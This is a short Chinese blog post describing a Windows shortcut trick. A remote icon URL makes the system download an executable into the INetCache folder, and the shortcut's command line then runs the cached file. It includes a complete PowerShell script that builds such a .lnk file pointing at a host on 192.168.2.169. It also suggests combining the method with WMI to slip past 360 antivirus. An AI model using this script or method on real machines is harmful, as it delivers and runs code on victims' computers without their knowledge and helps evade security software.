快捷方式图标下载执行exe

大晚上看到骚操作

image-20200627141547497

image-20200627141709216

看了下文章:

Using Shell Links as zero-touch downloaders and to initiate network connections

原理是利用hex修改快捷方式图标,当计算机获取文件之后会像链接请求并缓存到

C:\Users\f1veT\AppData\Local\Microsoft\Windows\INetCache\IE\下。

在修改链接指向cmd并执行他。

当我还在苦逼的修改hex时候,发现别人直接用ps1生成快捷方式。。。。。。。。mmp

$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("C:\users\f1veT\desktop\aaaa.lnk")
$shortcut.TargetPath = "C:\windows\system32\cmd.exe"
$shortcut.Arguments = ' /c "cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B calc*.exe | cmd.exe /k" '
$shortcut.IconLocation = "http://192.168.2.169:8000/calc.exe?.ico"
$shortcut.Save()

image-20200627145855344

生成运行后会弹出calc文件。

image-20200627145947832

在IE文件夹下会存在calc缓存,但是命名是calc[1].exe,所以使用dir /s /B来获取路径。

自己生成的和文章中的demo对比

aaa.lnk

image-20200627150138249

Demo.lnk

image-20200627150158836

可以看到运行成功。可以配合wmi绕过360等执行命令。

标签: none

添加新评论